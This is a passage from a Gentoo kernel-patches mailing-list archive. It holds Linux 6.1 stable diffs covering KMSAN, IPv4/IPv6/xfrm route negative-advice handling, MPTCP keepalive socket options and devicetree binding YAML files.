++	 * If the new origin is non-zero, assume that the shadow byte is also non-zero,
++	 * and unconditionally overwrite the old origin slot.
++	 * If the new origin is zero, overwrite the old origin slot iff the
++	 * corresponding shadow slot is zero.
++	 */
++	for (int i = 0; i < size / KMSAN_ORIGIN_SIZE; i++) {
++		if (origin || !shadow_start[i])
++			origin_start[i] = origin;
++	}
+ }
+ 
+ struct page *kmsan_vmalloc_to_page_or_null(void *vaddr)
+diff --git a/mm/pgtable-generic.c b/mm/pgtable-generic.c
+index 90ab721a12a82..6a582cc07023f 100644
+--- a/mm/pgtable-generic.c
++++ b/mm/pgtable-generic.c
+@@ -195,6 +195,7 @@ pgtable_t pgtable_trans_huge_withdraw(struct mm_struct *mm, pmd_t *pmdp)
+ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ 		     pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	pmd_t old = pmdp_establish(vma, address, pmdp, pmd_mkinvalid(*pmdp));
+ 	flush_pmd_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+ 	return old;
+@@ -205,6 +206,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ pmd_t pmdp_invalidate_ad(struct vm_area_struct *vma, unsigned long address,
+ 			 pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	return pmdp_invalidate(vma, address, pmdp);
+ }
+ #endif
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 1d9a8a1f3f107..0fc2d706d9c23 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -231,6 +231,8 @@ static int p9_fcall_init(struct p9_client *c, struct p9_fcall *fc,
+ 	if (!fc->sdata)
+ 		return -ENOMEM;
+ 	fc->capacity = alloc_msize;
++	fc->id = 0;
++	fc->tag = P9_NOTAG;
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 6c0f1e347b855..fcbacd39febe0 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -132,7 +132,8 @@ struct dst_entry	*ipv4_dst_check(struct dst_entry *dst, u32 cookie);
+ static unsigned int	 ipv4_default_advmss(const struct dst_entry *dst);
+ INDIRECT_CALLABLE_SCOPE
+ unsigned int		ipv4_mtu(const struct dst_entry *dst);
+-static struct dst_entry *ipv4_negative_advice(struct dst_entry *dst);
++static void		ipv4_negative_advice(struct sock *sk,
++					     struct dst_entry *dst);
+ static void		 ipv4_link_failure(struct sk_buff *skb);
+ static void		 ip_rt_update_pmtu(struct dst_entry *dst, struct sock *sk,
+ 					   struct sk_buff *skb, u32 mtu,
+@@ -837,22 +838,15 @@ static void ip_do_redirect(struct dst_entry *dst, struct sock *sk, struct sk_buf
+ 	__ip_do_redirect(rt, skb, &fl4, true);
+ }
+ 
+-static struct dst_entry *ipv4_negative_advice(struct dst_entry *dst)
++static void ipv4_negative_advice(struct sock *sk,
++				 struct dst_entry *dst)
+ {
+ 	struct rtable *rt = (struct rtable *)dst;
+-	struct dst_entry *ret = dst;
+ 
+-	if (rt) {
+-		if (dst->obsolete > 0) {
+-			ip_rt_put(rt);
+-			ret = NULL;
+-		} else if ((rt->rt_flags & RTCF_REDIRECTED) ||
+-			   rt->dst.expires) {
+-			ip_rt_put(rt);
+-			ret = NULL;
+-		}
+-	}
+-	return ret;
++	if ((dst->obsolete > 0) ||
++	    (rt->rt_flags & RTCF_REDIRECTED) ||
++	    rt->dst.expires)
++		sk_dst_reset(sk);
+ }
+ 
+ /*
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 887599d351b8d..258e87055836f 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -87,7 +87,8 @@ struct dst_entry	*ip6_dst_check(struct dst_entry *dst, u32 cookie);
+ static unsigned int	 ip6_default_advmss(const struct dst_entry *dst);
+ INDIRECT_CALLABLE_SCOPE
+ unsigned int		ip6_mtu(const struct dst_entry *dst);
+-static struct dst_entry *ip6_negative_advice(struct dst_entry *);
++static void		ip6_negative_advice(struct sock *sk,
++					    struct dst_entry *dst);
+ static void		ip6_dst_destroy(struct dst_entry *);
+ static void		ip6_dst_ifdown(struct dst_entry *,
+ 				       struct net_device *dev, int how);
+@@ -2762,24 +2763,24 @@ INDIRECT_CALLABLE_SCOPE struct dst_entry *ip6_dst_check(struct dst_entry *dst,
+ }
+ EXPORT_INDIRECT_CALLABLE(ip6_dst_check);
+ 
+-static struct dst_entry *ip6_negative_advice(struct dst_entry *dst)
++static void ip6_negative_advice(struct sock *sk,
++				struct dst_entry *dst)
+ {
+ 	struct rt6_info *rt = (struct rt6_info *) dst;
+ 
+-	if (rt) {
+-		if (rt->rt6i_flags & RTF_CACHE) {
+-			rcu_read_lock();
+-			if (rt6_check_expired(rt)) {
+-				rt6_remove_exception_rt(rt);
+-				dst = NULL;
+-			}
+-			rcu_read_unlock();
+-		} else {
+-			dst_release(dst);
+-			dst = NULL;
++	if (rt->rt6i_flags & RTF_CACHE) {
++		rcu_read_lock();
++		if (rt6_check_expired(rt)) {
++			/* counteract the dst_release() in sk_dst_reset() */
++			dst_hold(dst);
++			sk_dst_reset(sk);
++
++			rt6_remove_exception_rt(rt);
+ 		}
++		rcu_read_unlock();
++		return;
+ 	}
+-	return dst;
++	sk_dst_reset(sk);
+ }
+ 
+ static void ip6_link_failure(struct sk_buff *skb)
+@@ -4435,7 +4436,7 @@ static void rtmsg_to_fib6_config(struct net *net,
+ 		.fc_table = l3mdev_fib_table_by_index(net, rtmsg->rtmsg_ifindex) ?
+ 			 : RT6_TABLE_MAIN,
+ 		.fc_ifindex = rtmsg->rtmsg_ifindex,
+-		.fc_metric = rtmsg->rtmsg_metric ? : IP6_RT_PRIO_USER,
++		.fc_metric = rtmsg->rtmsg_metric,
+ 		.fc_expires = rtmsg->rtmsg_info,
+ 		.fc_dst_len = rtmsg->rtmsg_dst_len,
+ 		.fc_src_len = rtmsg->rtmsg_src_len,
+@@ -4465,6 +4466,9 @@ int ipv6_route_ioctl(struct net *net, unsigned int cmd, struct in6_rtmsg *rtmsg)
+ 	rtnl_lock();
+ 	switch (cmd) {
+ 	case SIOCADDRT:
++		/* Only do the default setting of fc_metric in route adding */
++		if (cfg.fc_metric == 0)
++			cfg.fc_metric = IP6_RT_PRIO_USER;
+ 		err = ip6_route_add(&cfg, GFP_KERNEL, NULL);
+ 		break;
+ 	case SIOCDELRT:
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 2bc37773e7803..eaed858c0ff94 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -288,6 +288,9 @@ struct mptcp_sock {
+ 			fastopening:1,
+ 			in_accept_queue:1,
+ 			free_first:1;
++	int		keepalive_cnt;
++	int		keepalive_idle;
++	int		keepalive_intvl;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index e59e46e07b5c9..ff82fc062ae76 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -616,20 +616,57 @@ static int mptcp_setsockopt_sol_tcp_congestion(struct mptcp_sock *msk, sockptr_t
+ 	return ret;
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, sockptr_t optval,
+-					 unsigned int optlen)
++static int __tcp_sock_set_keepintvl(struct sock *sk, int val)
+ {
+-	struct mptcp_subflow_context *subflow;
+-	struct sock *sk = (struct sock *)msk;
+-	int val;
++	if (val < 1 || val > MAX_TCP_KEEPINTVL)
++		return -EINVAL;
+ 
+-	if (optlen < sizeof(int))
++	WRITE_ONCE(tcp_sk(sk)->keepalive_intvl, val * HZ);
++
++	return 0;
++}
++
++static int __tcp_sock_set_keepcnt(struct sock *sk, int val)
++{
++	if (val < 1 || val > MAX_TCP_KEEPCNT)
+ 		return -EINVAL;
+ 
+-	if (copy_from_sockptr(&val, optval, sizeof(val)))
+-		return -EFAULT;
++	/* Paired with READ_ONCE() in keepalive_probes() */
++	WRITE_ONCE(tcp_sk(sk)->keepalive_probes, val);
++
++	return 0;
++}
++
++static int __mptcp_setsockopt_set_val(struct mptcp_sock *msk, int max,
++				      int (*set_val)(struct sock *, int),
++				      int *msk_val, int val)
++{
++	struct mptcp_subflow_context *subflow;
++	int err = 0;
++
++	mptcp_for_each_subflow(msk, subflow) {
++		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		int ret;
++
++		lock_sock(ssk);
++		ret = set_val(ssk, val);
++		err = err ? : ret;
++		release_sock(ssk);
++	}
++
++	if (!err) {
++		*msk_val = val;
++		sockopt_seq_inc(msk);
++	}
++
++	return err;
++}
++
++static int __mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, int val)
++{
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk = (struct sock *)msk;
+ 
+-	lock_sock(sk);
+ 	sockopt_seq_inc(msk);
+ 	msk->cork = !!val;
+ 	mptcp_for_each_subflow(msk, subflow) {
+@@ -641,25 +678,15 @@ static int mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, sockptr_t optva
+ 	}
+ 	if (!val)
+ 		mptcp_check_and_set_pending(sk);
+-	release_sock(sk);
+ 
+ 	return 0;
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, sockptr_t optval,
+-					    unsigned int optlen)
++static int __mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, int val)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct sock *sk = (struct sock *)msk;
+-	int val;
+-
+-	if (optlen < sizeof(int))
+-		return -EINVAL;
+-
+-	if (copy_from_sockptr(&val, optval, sizeof(val)))
+-		return -EFAULT;
+ 
+-	lock_sock(sk);
+ 	sockopt_seq_inc(msk);
+ 	msk->nodelay = !!val;
+ 	mptcp_for_each_subflow(msk, subflow) {
+@@ -671,8 +698,6 @@ static int mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, sockptr_t op
+ 	}
+ 	if (val)
+ 		mptcp_check_and_set_pending(sk);
+-	release_sock(sk);
+-
+ 	return 0;
+ }
+ 
+@@ -797,25 +822,10 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 	int ret, val;
+ 
+ 	switch (optname) {
+-	case TCP_INQ:
+-		ret = mptcp_get_int_option(msk, optval, optlen, &val);
+-		if (ret)
+-			return ret;
+-		if (val < 0 || val > 1)
+-			return -EINVAL;
+-
+-		lock_sock(sk);
+-		msk->recvmsg_inq = !!val;
+-		release_sock(sk);
+-		return 0;
+ 	case TCP_ULP:
+ 		return -EOPNOTSUPP;
+ 	case TCP_CONGESTION:
+ 		return mptcp_setsockopt_sol_tcp_congestion(msk, optval, optlen);
+-	case TCP_CORK:
+-		return mptcp_setsockopt_sol_tcp_cork(msk, optval, optlen);
+-	case TCP_NODELAY:
+-		return mptcp_setsockopt_sol_tcp_nodelay(msk, optval, optlen);
+ 	case TCP_DEFER_ACCEPT:
+ 		return mptcp_setsockopt_sol_tcp_defer(msk, optval, optlen);
+ 	case TCP_FASTOPEN_CONNECT:
+@@ -823,7 +833,46 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 						      optval, optlen);
+ 	}
+ 
+-	return -EOPNOTSUPP;
++	ret = mptcp_get_int_option(msk, optval, optlen, &val);
++	if (ret)
++		return ret;
++
++	lock_sock(sk);
++	switch (optname) {
++	case TCP_INQ:
++		if (val < 0 || val > 1)
++			ret = -EINVAL;
++		else
++			msk->recvmsg_inq = !!val;
++		break;
++	case TCP_CORK:
++		ret = __mptcp_setsockopt_sol_tcp_cork(msk, val);
++		break;
++	case TCP_NODELAY:
++		ret = __mptcp_setsockopt_sol_tcp_nodelay(msk, val);
++		break;
++	case TCP_KEEPIDLE:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPIDLE,
++						 &tcp_sock_set_keepidle_locked,
++						 &msk->keepalive_idle, val);
++		break;
++	case TCP_KEEPINTVL:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPINTVL,
++						 &__tcp_sock_set_keepintvl,
++						 &msk->keepalive_intvl, val);
++		break;
++	case TCP_KEEPCNT:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPCNT,
++						 &__tcp_sock_set_keepcnt,
++						 &msk->keepalive_cnt,
++						 val);
++		break;
++	default:
++		ret = -ENOPROTOOPT;
++	}
++
++	release_sock(sk);
++	return ret;
+ }
+ 
+ int mptcp_setsockopt(struct sock *sk, int level, int optname,
+@@ -1176,6 +1225,8 @@ static int mptcp_put_int_option(struct mptcp_sock *msk, char __user *optval,
+ static int mptcp_getsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 				    char __user *optval, int __user *optlen)
+ {
++	struct sock *sk = (void *)msk;
++
+ 	switch (optname) {
+ 	case TCP_ULP:
+ 	case TCP_CONGESTION:
+@@ -1191,6 +1242,18 @@ static int mptcp_getsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 		return mptcp_put_int_option(msk, optval, optlen, msk->cork);
+ 	case TCP_NODELAY:
+ 		return mptcp_put_int_option(msk, optval, optlen, msk->nodelay);
++	case TCP_KEEPIDLE:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_idle ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_time) / HZ);
++	case TCP_KEEPINTVL:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_intvl ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_intvl) / HZ);
++	case TCP_KEEPCNT:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_cnt ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_probes));
+ 	}
+ 	return -EOPNOTSUPP;
+ }
+@@ -1295,6 +1358,9 @@ static void sync_socket_options(struct mptcp_sock *msk, struct sock *ssk)
+ 		tcp_set_congestion_control(ssk, msk->ca_name, false, true);
+ 	__tcp_sock_set_cork(ssk, !!msk->cork);
+ 	__tcp_sock_set_nodelay(ssk, !!msk->nodelay);
++	tcp_sock_set_keepidle_locked(ssk, msk->keepalive_idle);
++	__tcp_sock_set_keepintvl(ssk, msk->keepalive_intvl);
++	__tcp_sock_set_keepcnt(ssk, msk->keepalive_cnt);
+ 
+ 	inet_sk(ssk)->transparent = inet_sk(sk)->transparent;
+ 	inet_sk(ssk)->freebind = inet_sk(sk)->freebind;
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e47c670c7e2cd..5fddde2d5bc48 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3772,15 +3772,10 @@ static void xfrm_link_failure(struct sk_buff *skb)
+ 	/* Impossible. Such dst must be popped before reaches point of failure. */
+ }
+ 
+-static struct dst_entry *xfrm_negative_advice(struct dst_entry *dst)
++static void xfrm_negative_advice(struct sock *sk, struct dst_entry *dst)
+ {
+-	if (dst) {
+-		if (dst->obsolete) {
+-			dst_release(dst);
+-			dst = NULL;
+-		}
+-	}
+-	return dst;
++	if (dst->obsolete)
++		sk_dst_reset(sk);
+ }
+ 
+ static void xfrm_init_pmtu(struct xfrm_dst **bundle, int nr)
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 08f0587d15ea1..0ff707bc18960 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -46,12 +46,12 @@ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+ 
+ /* linux/fs.h */
+-LX_VALUE(SB_RDONLY)
+-LX_VALUE(SB_SYNCHRONOUS)
+-LX_VALUE(SB_MANDLOCK)
+-LX_VALUE(SB_DIRSYNC)
+-LX_VALUE(SB_NOATIME)
+-LX_VALUE(SB_NODIRATIME)
++LX_GDBPARSED(SB_RDONLY)
++LX_GDBPARSED(SB_SYNCHRONOUS)
++LX_GDBPARSED(SB_MANDLOCK)
++LX_GDBPARSED(SB_DIRSYNC)
++LX_GDBPARSED(SB_NOATIME)
++LX_GDBPARSED(SB_NODIRATIME)
+ 
+ /* linux/htimer.h */
+ LX_GDBPARSED(hrtimer_resolution)


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-12 10:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-12 10:16 UTC (permalink / raw
  To: gentoo-commits

commit:     2c76c655d5ba0db36c8ad9865ca16b5c0ec9063a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 12 10:15:46 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 12 10:15:46 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2c76c655

Linux patch 6.1.93

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1092_linux-6.1.93.patch | 17418 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 17422 insertions(+)

diff --git a/0000_README b/0000_README
index 0d537557..87ce6763 100644
--- a/0000_README
+++ b/0000_README
@@ -411,6 +411,10 @@ Patch:  1091_linux-6.1.92.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.92
 
+Patch:  1092_linux-6.1.93.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.93
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1092_linux-6.1.93.patch b/1092_linux-6.1.93.patch
new file mode 100644
index 00000000..b086415a
--- /dev/null
+++ b/1092_linux-6.1.93.patch
@@ -0,0 +1,17418 @@
+diff --git a/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml b/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
+index cf456f8d9ddcb..c87677f5e2a25 100644
+--- a/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
++++ b/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
+@@ -37,15 +37,15 @@ properties:
+       active low.
+     maxItems: 1
+ 
+-  dovdd-supply:
++  DOVDD-supply:
+     description:
+       Definition of the regulator used as interface power supply.
+ 
+-  avdd-supply:
++  AVDD-supply:
+     description:
+       Definition of the regulator used as analog power supply.
+ 
+-  dvdd-supply:
++  DVDD-supply:
+     description:
+       Definition of the regulator used as digital power supply.
+ 
+@@ -59,9 +59,9 @@ required:
+   - reg
+   - clocks
+   - clock-names
+-  - dovdd-supply
+-  - avdd-supply
+-  - dvdd-supply
++  - DOVDD-supply
++  - AVDD-supply
++  - DVDD-supply
+   - reset-gpios
+   - port
+ 
+@@ -82,9 +82,9 @@ examples:
+                 clock-names = "xvclk";
+                 reset-gpios = <&gpio1 3 GPIO_ACTIVE_LOW>;
+ 
+-                dovdd-supply = <&sw2_reg>;
+-                dvdd-supply = <&sw2_reg>;
+-                avdd-supply = <&reg_peri_3p15v>;
++                DOVDD-supply = <&sw2_reg>;
++                DVDD-supply = <&sw2_reg>;
++                AVDD-supply = <&reg_peri_3p15v>;
+ 
+                 port {
+                         ov2680_to_mipi: endpoint {
+diff --git a/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml b/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
+index 8fdfbc763d704..835b6db00c279 100644
+--- a/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
++++ b/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
+@@ -68,6 +68,18 @@ properties:
+   phy-names:
+     const: pcie
+ 
++  vpcie1v5-supply:
++    description: The 1.5v regulator to use for PCIe.
++
++  vpcie3v3-supply:
++    description: The 3.3v regulator to use for PCIe.
++
++  vpcie12v-supply:
++    description: The 12v regulator to use for PCIe.
++
++  iommu-map: true
++  iommu-map-mask: true
++
+ required:
+   - compatible
+   - reg
+@@ -121,5 +133,7 @@ examples:
+              clock-names = "pcie", "pcie_bus";
+              power-domains = <&sysc R8A7791_PD_ALWAYS_ON>;
+              resets = <&cpg 319>;
++             vpcie3v3-supply = <&pcie_3v3>;
++             vpcie12v-supply = <&pcie_12v>;
+          };
+     };
+diff --git a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
+index c9ea0cad489b7..3767981409005 100644
+--- a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
++++ b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
+@@ -97,7 +97,8 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [emmc, emmc_rst]
++                  items:
++                    enum: [emmc, emmc_rst]
+           - if:
+               properties:
+                 function:
+@@ -105,8 +106,9 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [esw, esw_p0_p1, esw_p2_p3_p4, rgmii_via_esw,
+-                         rgmii_via_gmac1, rgmii_via_gmac2, mdc_mdio]
++                  items:
++                    enum: [esw, esw_p0_p1, esw_p2_p3_p4, rgmii_via_esw,
++                           rgmii_via_gmac1, rgmii_via_gmac2, mdc_mdio]
+           - if:
+               properties:
+                 function:
+@@ -123,10 +125,11 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [i2s_in_mclk_bclk_ws, i2s1_in_data, i2s2_in_data,
+-                         i2s3_in_data, i2s4_in_data, i2s_out_mclk_bclk_ws,
+-                         i2s1_out_data, i2s2_out_data, i2s3_out_data,
+-                         i2s4_out_data]
++                  items:
++                    enum: [i2s_in_mclk_bclk_ws, i2s1_in_data, i2s2_in_data,
++                           i2s3_in_data, i2s4_in_data, i2s_out_mclk_bclk_ws,
++                           i2s1_out_data, i2s2_out_data, i2s3_out_data,
++                           i2s4_out_data]
+           - if:
+               properties:
+                 function:
+@@ -159,10 +162,11 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [pcie0_0_waken, pcie0_1_waken, pcie1_0_waken,
+-                         pcie0_0_clkreq, pcie0_1_clkreq, pcie1_0_clkreq,
+-                         pcie0_pad_perst, pcie1_pad_perst, pcie_pereset,
+-                         pcie_wake, pcie_clkreq]
++                  items:
++                    enum: [pcie0_0_waken, pcie0_1_waken, pcie1_0_waken,
++                           pcie0_0_clkreq, pcie0_1_clkreq, pcie1_0_clkreq,
++                           pcie0_pad_perst, pcie1_pad_perst, pcie_pereset,
++                           pcie_wake, pcie_clkreq]
+           - if:
+               properties:
+                 function:
+@@ -178,11 +182,12 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [pwm_ch1_0, pwm_ch1_1, pwm_ch1_2, pwm_ch2_0, pwm_ch2_1,
+-                         pwm_ch2_2, pwm_ch3_0, pwm_ch3_1, pwm_ch3_2, pwm_ch4_0,
+-                         pwm_ch4_1, pwm_ch4_2, pwm_ch4_3, pwm_ch5_0, pwm_ch5_1,
+-                         pwm_ch5_2, pwm_ch6_0, pwm_ch6_1, pwm_ch6_2, pwm_ch6_3,
+-                         pwm_ch7_0, pwm_0, pwm_1]
++                  items:
++                    enum: [pwm_ch1_0, pwm_ch1_1, pwm_ch1_2, pwm_ch2_0, pwm_ch2_1,
++                           pwm_ch2_2, pwm_ch3_0, pwm_ch3_1, pwm_ch3_2, pwm_ch4_0,
++                           pwm_ch4_1, pwm_ch4_2, pwm_ch4_3, pwm_ch5_0, pwm_ch5_1,
++                           pwm_ch5_2, pwm_ch6_0, pwm_ch6_1, pwm_ch6_2, pwm_ch6_3,
++                           pwm_ch7_0, pwm_0, pwm_1]
+           - if:
+               properties:
+                 function:
+@@ -260,33 +265,34 @@ patternProperties:
+           pins:
+             description: |
+               An array of strings. Each string contains the name of a pin.
+-            enum: [GPIO_A, I2S1_IN, I2S1_OUT, I2S_BCLK, I2S_WS, I2S_MCLK, TXD0,
+-                   RXD0, SPI_WP, SPI_HOLD, SPI_CLK, SPI_MOSI, SPI_MISO, SPI_CS,
+-                   I2C_SDA, I2C_SCL, I2S2_IN, I2S3_IN, I2S4_IN, I2S2_OUT,
+-                   I2S3_OUT, I2S4_OUT, GPIO_B, MDC, MDIO, G2_TXD0, G2_TXD1,
+-                   G2_TXD2, G2_TXD3, G2_TXEN, G2_TXC, G2_RXD0, G2_RXD1, G2_RXD2,
+-                   G2_RXD3, G2_RXDV, G2_RXC, NCEB, NWEB, NREB, NDL4, NDL5, NDL6,
+-                   NDL7, NRB, NCLE, NALE, NDL0, NDL1, NDL2, NDL3, MDI_TP_P0,
+-                   MDI_TN_P0, MDI_RP_P0, MDI_RN_P0, MDI_TP_P1, MDI_TN_P1,
+-                   MDI_RP_P1, MDI_RN_P1, MDI_RP_P2, MDI_RN_P2, MDI_TP_P2,
+-                   MDI_TN_P2, MDI_TP_P3, MDI_TN_P3, MDI_RP_P3, MDI_RN_P3,
+-                   MDI_RP_P4, MDI_RN_P4, MDI_TP_P4, MDI_TN_P4, PMIC_SCL,
+-                   PMIC_SDA, SPIC1_CLK, SPIC1_MOSI, SPIC1_MISO, SPIC1_CS,
+-                   GPIO_D, WATCHDOG, RTS3_N, CTS3_N, TXD3, RXD3, PERST0_N,
+-                   PERST1_N, WLED_N, EPHY_LED0_N, AUXIN0, AUXIN1, AUXIN2,
+-                   AUXIN3, TXD4, RXD4, RTS4_N, CST4_N, PWM1, PWM2, PWM3, PWM4,
+-                   PWM5, PWM6, PWM7, GPIO_E, TOP_5G_CLK, TOP_5G_DATA,
+-                   WF0_5G_HB0, WF0_5G_HB1, WF0_5G_HB2, WF0_5G_HB3, WF0_5G_HB4,
+-                   WF0_5G_HB5, WF0_5G_HB6, XO_REQ, TOP_RST_N, SYS_WATCHDOG,
+-                   EPHY_LED0_N_JTDO, EPHY_LED1_N_JTDI, EPHY_LED2_N_JTMS,
+-                   EPHY_LED3_N_JTCLK, EPHY_LED4_N_JTRST_N, WF2G_LED_N,
+-                   WF5G_LED_N, GPIO_9, GPIO_10, GPIO_11, GPIO_12, UART1_TXD,
+-                   UART1_RXD, UART1_CTS, UART1_RTS, UART2_TXD, UART2_RXD,
+-                   UART2_CTS, UART2_RTS, SMI_MDC, SMI_MDIO, PCIE_PERESET_N,
+-                   PWM_0, GPIO_0, GPIO_1, GPIO_2, GPIO_3, GPIO_4, GPIO_5,
+-                   GPIO_6, GPIO_7, GPIO_8, UART0_TXD, UART0_RXD, TOP_2G_CLK,
+-                   TOP_2G_DATA, WF0_2G_HB0, WF0_2G_HB1, WF0_2G_HB2, WF0_2G_HB3,
+-                   WF0_2G_HB4, WF0_2G_HB5, WF0_2G_HB6]
++            items:
++              enum: [GPIO_A, I2S1_IN, I2S1_OUT, I2S_BCLK, I2S_WS, I2S_MCLK, TXD0,
++                     RXD0, SPI_WP, SPI_HOLD, SPI_CLK, SPI_MOSI, SPI_MISO, SPI_CS,
++                     I2C_SDA, I2C_SCL, I2S2_IN, I2S3_IN, I2S4_IN, I2S2_OUT,
++                     I2S3_OUT, I2S4_OUT, GPIO_B, MDC, MDIO, G2_TXD0, G2_TXD1,
++                     G2_TXD2, G2_TXD3, G2_TXEN, G2_TXC, G2_RXD0, G2_RXD1, G2_RXD2,
++                     G2_RXD3, G2_RXDV, G2_RXC, NCEB, NWEB, NREB, NDL4, NDL5, NDL6,
++                     NDL7, NRB, NCLE, NALE, NDL0, NDL1, NDL2, NDL3, MDI_TP_P0,
++                     MDI_TN_P0, MDI_RP_P0, MDI_RN_P0, MDI_TP_P1, MDI_TN_P1,
++                     MDI_RP_P1, MDI_RN_P1, MDI_RP_P2, MDI_RN_P2, MDI_TP_P2,
++                     MDI_TN_P2, MDI_TP_P3, MDI_TN_P3, MDI_RP_P3, MDI_RN_P3,
++                     MDI_RP_P4, MDI_RN_P4, MDI_TP_P4, MDI_TN_P4, PMIC_SCL,
++                     PMIC_SDA, SPIC1_CLK, SPIC1_MOSI, SPIC1_MISO, SPIC1_CS,
++                     GPIO_D, WATCHDOG, RTS3_N, CTS3_N, TXD3, RXD3, PERST0_N,
++                     PERST1_N, WLED_N, EPHY_LED0_N, AUXIN0, AUXIN1, AUXIN2,
++                     AUXIN3, TXD4, RXD4, RTS4_N, CST4_N, PWM1, PWM2, PWM3, PWM4,
++                     PWM5, PWM6, PWM7, GPIO_E, TOP_5G_CLK, TOP_5G_DATA,
++                     WF0_5G_HB0, WF0_5G_HB1, WF0_5G_HB2, WF0_5G_HB3, WF0_5G_HB4,
++                     WF0_5G_HB5, WF0_5G_HB6, XO_REQ, TOP_RST_N, SYS_WATCHDOG,
++                     EPHY_LED0_N_JTDO, EPHY_LED1_N_JTDI, EPHY_LED2_N_JTMS,
++                     EPHY_LED3_N_JTCLK, EPHY_LED4_N_JTRST_N, WF2G_LED_N,
++                     WF5G_LED_N, GPIO_9, GPIO_10, GPIO_11, GPIO_12, UART1_TXD,
++                     UART1_RXD, UART1_CTS, UART1_RTS, UART2_TXD, UART2_RXD,
++                     UART2_CTS, UART2_RTS, SMI_MDC, SMI_MDIO, PCIE_PERESET_N,
++                     PWM_0, GPIO_0, GPIO_1, GPIO_2, GPIO_3, GPIO_4, GPIO_5,
